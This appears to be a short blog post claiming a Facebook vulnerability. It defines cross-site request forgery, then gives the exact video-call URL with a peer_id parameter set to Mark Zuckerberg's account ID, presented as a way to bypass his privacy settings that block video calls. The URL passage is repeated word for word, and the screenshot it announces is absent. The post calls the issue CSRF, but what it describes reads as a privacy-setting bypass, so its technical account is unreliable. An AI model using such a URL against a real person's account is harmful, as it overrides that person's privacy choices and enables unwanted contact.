Vulnerability – CSRF
A Cross-Site Request Forgery (CSRF) Vulnerability is a type of attack that occurs when a malicious Web site, email, blog, instant message, or program causes a user?s Web browser to perform an unwanted action on a trusted site for which the user is currently authenticated.
This vulnerability allows with a GET (In-URI) CSRF
Parameter to avoid the Video-Calling blocks into Mark Zuckerberg Privacy
Setting’s.
___________________________________________________________________
To Video Call on Facebook URL used is –
https://www.facebook.com/videocall/incall/
The Vulnerable GET Parameter is –
https://www.facebook.com/videocall/incall/?peer_id=
After the peer_id= parameter, we’ll insert Mark Zuckerberg ID (which is id=4)
Exact URL is –
https://www.facebook.com/videocall/incall/?peer_id=4
The Vulnerable GET Parameter is –
https://www.facebook.com/videocall/incall/?peer_id=
After the peer_id= parameter, we’ll insert Mark Zuckerberg ID (which is id=4)
Exact URL is –
https://www.facebook.com/videocall/incall/?peer_id=4
Screenshot look Like -
0 comments:
Post a Comment